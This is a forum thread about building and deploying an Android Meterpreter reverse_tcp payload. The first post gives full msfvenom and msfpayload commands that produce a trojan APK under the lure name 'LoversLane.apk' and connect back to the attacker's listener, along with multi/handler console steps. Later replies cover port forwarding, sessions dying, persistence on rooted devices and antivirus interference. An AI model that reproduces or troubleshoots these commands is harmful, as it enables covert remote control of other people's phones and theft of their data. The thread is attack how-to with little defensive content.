Results 1 to 10 of 10

Thread: Android Reverse_tcp

  1. #1
    Join Date
    2015-Jul
    Posts
    2

    Android Reverse_tcp

    Hello Ive been attmepting the Adroid Hack on my personal phone. My kali is loaded on a Vmware Debian x64
    Im using a Samsung Galaxy S5 and 2 S4s. Noneof the phonesreturn an IP address to Kali when the apps are opened.
    Ive created my payloads using MsfVenom and msfpayload.

    msfvenom -p android/meterpreter/reverse_tcp LHOST= 192.168.43.107 LPORT=4444 R > /root/LoversLane.apk

    msfpayload android/meterpreter/reverse_tcp LHOST=192.168.43.107 LPORT=4444 R > /root/LoversLane.apk

    OPEN NEW TO START CONSOLE TYPE:
    msfconsole
    use multi/handler
    use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    set LHOST 192.168.43.107
    set LPORT 4444
    exploit

  2. #2
    Port forwarded on router? 4444 ---->192.168.43.107

  3. #3
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    if this can BE a possibly help:
    https://vimeo.com/134137685

    ps(sorry for slowing ) :-)

  4. #4
    Join Date
    2015-Jul
    Posts
    2
    Hi guis,
    I follow the some method of D-li, but when i run in console the command Exploit i recive this msg:
    msf exploit(handler) > exploit

    [-] Exploit failed: No such file or directory @ realpath_rec - /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/metasploit-payloads-1.0.3
    Sorry for the english, do you know why? :|

  5. #5
    Join Date
    2013-Dec
    Location
    Krakow
    Posts
    67
    Quote Originally Posted by Anymore View Post
    Hi guis,
    I follow the some method of D-li, but when i run in console the command Exploit i recive this msg:


    Sorry for the english, do you know why? :|
    Please check your msf version:
    =[ metasploit v4.11.4-2015071402 ]
    + -- --=[ 1467 exploits - 840 auxiliary - 232 post ]
    + -- --=[ 432 payloads - 37 encoders - 8 nops ]
    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

    msf > use exploit/multi/handler
    msf exploit(handler) > set payload android/meterpreter/reverse_tcp
    payload => android/meterpreter/reverse_tcp
    msf exploit(handler) > set LPORT 4444
    LPORT => 4444
    msf exploit(handler) > set LHOST 127.0.0.1
    LHOST => 127.0.0.1
    msf exploit(handler) > exploit
    [*] Started reverse handler on 127.0.0.1:4444 [*] Starting the payload handler...

  6. #6
    Join Date
    2015-Dec
    Posts
    1
    Whenever I use reverse_tcp for Android, the sessions keeps dying out. Is it because my device or another reason?

  7. #7
    Azharudheen Guest
    [QUOTEmsf exploit(handler) > exploit[*] Started reverse handler on 127.0.0.1:4444[*] Starting the payload handler..][/QUOTE] i got untill this.... then nothing... what should i do?! please help me

  8. #8

    Payload Keeps dying!

    Quote Originally Posted by ricardoroxs View Post
    Whenever I use reverse_tcp for Android, the sessions keeps dying out. Is it because my device or another reason?
    Its is your device. There are a few reasons why the payload dies off. What are you doing when it dies? and what error are you getting on the host side?

    If the device is not rooted the payload is not persistent, (if they restart the phone then you lose connection, if the kill the app same thing happens).
    Another side note, if your trying the payload over and over make sure you delete the old one from the phone. (Check the download folder)

    I am trying a few ways of rooting remotely but its a project I just started.

  9. #9
    Quote Originally Posted by ricardoroxs View Post
    Whenever I use reverse_tcp for Android, the sessions keeps dying out. Is it because my device or another reason?
    It could also be getting killed under low memory conditions, or like with me, my anti virus kills it off.

  10. #10
    Join Date
    2016-Dec
    Posts
    1
    Hello,
    I'm stuck at the port-forwarding, since the video doesnt show which type i have to choose (tcp udp). Btw I'm using a fritzbox.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •